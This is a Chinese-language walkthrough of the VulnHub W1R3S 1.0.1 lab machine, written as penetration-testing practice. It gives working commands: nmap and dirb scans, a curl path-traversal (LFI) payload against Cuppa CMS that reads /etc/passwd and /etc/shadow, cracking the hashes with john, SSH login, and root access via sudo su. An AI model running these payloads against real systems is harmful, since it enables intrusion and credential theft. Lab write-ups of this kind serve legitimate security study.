Vulhub W1R3S: 1.0.1靶机详解

项目地址

plain 复制代码
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

实验过程

开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

plain 复制代码
nmap 192.168.47.1-254

根据对比可知W1R3S: 1.0.1的一个ip地址为192.168.47.172

扫描W1R3S: 1.0.1的操作系统,端口及对应服务

plain 复制代码
nmap -A -p- 192.168.47.172

发现该靶机开放了21,22,80,3306端口

目录扫描

plain 复制代码
dirb http://192.168.47.172

获取shell

访问网站

拼接访问目录扫描出的目录/administrator

这是一个数据库的安装创建,但不知道密码和数据库名

观察网页标题为Cuppa CMS

搜索一下它的历史漏洞

plain 复制代码
searchsploit cuppa
plain 复制代码
searchsploit -m php/webapps/25971.txt

文件中描述说,/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件

在网页上面进行尝试访问,发现没有回显结果

用curl 尝试看可不可以下载下来

plain 复制代码
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.47.172/administrator/alerts/alertConfigField.php

在文件中发现了 w1r3s 用户,用同样的方法获得存密码的shadow文件试试,发现了 rootwww-dataw1r3s用户的密码

plain 复制代码
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.47.172/administrator/alerts/alertConfigField.php

将密码存到一个文件中进行爆破

plain 复制代码
vim password.txt
cat password.txt
plain 复制代码
john password.txt

使用ssh进行远程连接,发现w1r3s用户连接成功

plain 复制代码
ssh w1r3s@192.168.47.172

提权

查看可执行的命令

plain 复制代码
sudo -l

发现是ALL

直接sudo su提权

提权成功

相关推荐
xixiaoyunya6 小时前
内网穿透工具选型分析:从 ngrok 的局限性看国内开发场景下的替代方案
网络
FreeTinker6 小时前
远程查看的技术路径与工程选型分析
网络
Chengbei116 小时前
DSH渗透测试插件dsh-pentest全新升级!适配DeepSeek Harness,可视化探索链路,一键搭建轻量化AI渗透测试环境。
人工智能·web安全·网络安全·微信·小程序·系统安全·安全架构
嵌入式阿蔡8 小时前
传感器_03:电机驱动——让 GPIO 当指挥官,别让 GPIO 当电源
网络·stm32·单片机·嵌入式硬件·嵌入式实时数据库
YXXY3139 小时前
网络基础2(三)
网络
m24tyy10 小时前
常见空间测绘搜索引擎介绍和使用以及子域名的收集
网络·测试工具·搜索引擎
数据安全技术观察10 小时前
数据动态脱敏:让脱敏策略跟着数据目录走
大数据·网络·数据库
我爱cope10 小时前
【计算机网络 | 网络层1:网络层的职责:IP 协议究竟解决了什么问题?】
网络·tcp/ip·计算机网络
dogstarhuang13 小时前
OpenAI GPT-5.6 降价后如何重算 API 账单?多模型路由与成本治理实战
服务器·网络·人工智能·大模型·api·ai应用开发·接口管理
苏宸啊13 小时前
linux网络编程udp服务器和客户端代码编写(echo版本和字典版本)
linux·网络